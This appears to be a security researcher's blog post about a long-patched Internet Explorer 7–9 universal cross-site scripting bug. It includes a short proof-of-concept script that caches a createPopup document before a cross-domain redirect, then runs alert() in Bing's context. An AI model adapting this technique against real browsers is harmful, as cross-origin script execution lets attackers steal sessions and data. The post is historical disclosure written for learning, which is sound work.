Resident Cached createPopup Document Survives Redirect

This is a variant of the cached-object redirect pattern. Instead of caching a collection like styleSheets, I saved a reference to a createPopup document object before the containing window redirected to another domain. After the redirect completed, the cached popup document remained alive and fully scriptable — and since it ran in the context of the redirected window, it was effectively operating on behalf of the new origin.

<script language="JavaScript">
var doc;

function main()
{
    win = window.open("redirect.aspx");
    doc = win.createPopup().document
    setTimeout('doc.parentWindow.alert("An alert inside Bing!");',2000);
}
</script>
<input type="button" onclick="main()" value="Run PoC">

The key steps are: open the window (which will redirect to Bing), immediately create a popup and save its document reference, then wait two seconds for the redirect to complete. After that, doc.parentWindow.alert() fires inside the Bing context. The technique works on Vista IE7 and Windows 7 IE8/IE9 because the popup document’s lifetime is tied to the window object rather than the navigated URL.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS: Cached document.styleSheets and document.selection Survive Redirect] :: [WMP Popup Blocker Bypass via scriptcommand in WMV or launchURL] >